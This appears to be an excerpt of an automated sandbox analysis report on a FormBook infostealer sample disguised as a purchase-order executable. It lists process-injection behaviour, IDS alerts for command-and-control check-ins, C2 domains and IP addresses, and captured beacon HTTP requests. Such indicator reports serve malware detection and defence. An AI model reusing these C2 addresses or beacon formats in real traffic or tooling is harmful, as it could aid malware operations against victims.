          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\NULLJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 4x nop then jmp 04E2DE3Ah0_2_04E2D53C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop esi9_2_0041731B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop ebx9_2_00407B20
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 4x nop then jmp 04B3D38Ah11_2_04B3CA8C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop esi14_2_029E731B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop ebx14_2_029D7B22

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49724 -> 185.53.179.92:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49729 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49732 -> 203.196.8.7:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49734 -> 15.197.142.173:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49736 -> 192.250.227.27:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49737 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49739 -> 104.18.187.223:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49740 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 54.67.42.145:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.92 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.upcyclecharms.com/md02/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.mzhhxxff.xyz
          Source: DNS query: www.a1b5v.xyz
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=O2vdgLwRhMAgOHoS701s4xS4xJeZ/+uwNgHwz2yOIOwCqMZJzZYnLthi8nNL68HJ3+dRBVTqOQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.ux-design-courses-17184.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=50vPMniPucPBFAoGypRNvn+9klri27h0dApk4meYCliplUm/ww094FdaSsyOnJ5jMG3DM+yUOg==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.coloradoskinwellness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=4AwpHqQNViPAc6H2SH6W32NBDbh/yf/Y2D8hgqFIHxnXsLrA8hdQjo1iXHj4HnJ/ZqvHoeNZWw==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.tiantiying.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=TC5sRGY/d0WrdY74L9um5PW4cqP23O9TC/qUYRxTqxu6QMwh8ii9j/dDz35GSdofbeImGevgjQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.theopencomputeproject.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=Cq7+/Ky+K6vI68NpDrm1YJYa3GKRdZGNexOywzaDimkbuuqps0atd8BONpkLeDzS4/cRTt0qqA==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.equipoleiremnacional.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=M1D20hrtEA0YXOf/HK2sZrZVDkFjWbXD84BuCtYvxk7BtbkSICST3Apq92N7VT2icGdL8Ejrhw==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.detroitreels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=Huvb14v0kOWfNfmpMWoBgNUO4U2JwQZ3Rl/9gDSI5Y6jcOUTIOoj4XqjJyszJ9ZVOt8xpVdhjQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.upcyclecharms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewIP Address: 185.53.179.92 185.53.179.92
          Source: Joe Sandbox ViewASN Name: CNSV-LLCUS CNSV-LLCUS
          Source: Joe Sandbox ViewASN Name: SQUARESPACEUS SQUARESPACEUS
          Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: Joe Sandbox ViewASN Name: CHINATELECOM-CORE-WAN-CN2ChinaTelecomNextGenerationCarr CHINATELECOM-CORE-WAN-CN2ChinaTelecomNextGenerationCarr
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 10_2_10474F82 getaddrinfo,setsockopt,recv,10_2_10474F82
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=O2vdgLwRhMAgOHoS701s4xS4xJeZ/+uwNgHwz2yOIOwCqMZJzZYnLthi8nNL68HJ3+dRBVTqOQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.ux-design-courses-17184.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=50vPMniPucPBFAoGypRNvn+9klri27h0dApk4meYCliplUm/ww094FdaSsyOnJ5jMG3DM+yUOg==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.coloradoskinwellness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=4AwpHqQNViPAc6H2SH6W32NBDbh/yf/Y2D8hgqFIHxnXsLrA8hdQjo1iXHj4HnJ/ZqvHoeNZWw==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.tiantiying.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=TC5sRGY/d0WrdY74L9um5PW4cqP23O9TC/qUYRxTqxu6QMwh8ii9j/dDz35GSdofbeImGevgjQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.theopencomputeproject.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=Cq7+/Ky+K6vI68NpDrm1YJYa3GKRdZGNexOywzaDimkbuuqps0atd8BONpkLeDzS4/cRTt0qqA==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.equipoleiremnacional.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=M1D20hrtEA0YXOf/HK2sZrZVDkFjWbXD84BuCtYvxk7BtbkSICST3Apq92N7VT2icGdL8Ejrhw==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.detroitreels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?TPXh=Huvb14v0kOWfNfmpMWoBgNUO4U2JwQZ3Rl/9gDSI5Y6jcOUTIOoj4XqjJyszJ9ZVOt8xpVdhjQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1Host: www.upcyclecharms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.ux-design-courses-17184.bond
          Source: global trafficDNS traffic detected: DNS query: www.mzhhxxff.xyz
          Source: global trafficDNS traffic detected: DNS query: www.coloradoskinwellness.com
          Source: global trafficDNS traffic detected: DNS query: www.tiantiying.com
          Source: global trafficDNS traffic detected: DNS query: www.theopencomputeproject.net
          Source: global trafficDNS traffic detected: DNS query: www.z8ggd.com
          Source: global trafficDNS traffic detected: DNS query: www.equipoleiremnacional.com
          Source: global trafficDNS traffic detected: DNS query: www.detroitreels.com
          Source: global trafficDNS traffic detected: DNS query: www.family-lawyers-7009103.world
          Source: global trafficDNS traffic detected: DNS query: www.upcyclecharms.com
          Source: global trafficDNS traffic detected: DNS query: www.a1b5v.xyz
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Wed, 03 Jul 2024 16:34:18 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: explorer.exe, 0000000A.00000000.2162129240.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: Orden de compra 0307AR24.exe, RggSaCWUvAyNK.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: Orden de compra 0307AR24.exe, RggSaCWUvAyNK.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
          Source: explorer.exe, 0000000A.00000000.2162129240.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 0000000A.00000000.2162129240.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: Orden de compra 0307AR24.exe, RggSaCWUvAyNK.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
          Source: explorer.exe, 0000000A.00000000.2162129240.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 0000000A.00000002.4554376951.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 0000000A.00000000.2149371209.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4553241787.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2158143690.0000000007B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: Orden de compra 0307AR24.exe, 00000000.00000002.2164458182.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, RggSaCWUvAyNK.exe, 0000000B.00000002.2237101497.0000000002B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.117myw.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.117myw.com/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.117myw.com/md02/www.webuyandsellpa.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.117myw.comReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.a1b5v.xyz
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.a1b5v.xyz/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.a1b5v.xyz/md02/www.117myw.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.a1b5v.xyzReferer:
          Source: explorer.exe, 0000000A.00000003.2979693708.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2985382481.000000000C401000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2168253854.000000000C3FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558403675.000000000C402000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2985244166.000000000C40E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.coloradoskinwellness.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.coloradoskinwellness.com/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.coloradoskinwellness.com/md02/www.tiantiying.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.coloradoskinwellness.comReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.detroitreels.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.detroitreels.com/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.detroitreels.com/md02/www.family-lawyers-7009103.world
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.detroitreels.comReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.equipoleiremnacional.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.equipoleiremnacional.com/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.equipoleiremnacional.com/md02/www.detroitreels.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.equipoleiremnacional.comReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.family-lawyers-7009103.world
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.family-lawyers-7009103.world/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.family-lawyers-7009103.world/md02/www.upcyclecharms.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.family-lawyers-7009103.worldReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hecxion.xyz
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hecxion.xyz/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hecxion.xyz/md02/www.theopencomputeproject.net
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hecxion.xyzReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mzhhxxff.xyz
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mzhhxxff.xyz/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mzhhxxff.xyz/md02/www.coloradoskinwellness.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mzhhxxff.xyzReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rnwaifu.xyz
          Source: explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rnwaifu.xyz/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rnwaifu.xyzReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theopencomputeproject.net
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theopencomputeproject.net/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theopencomputeproject.net/md02/www.z8ggd.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theopencomputeproject.netReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiantiying.com
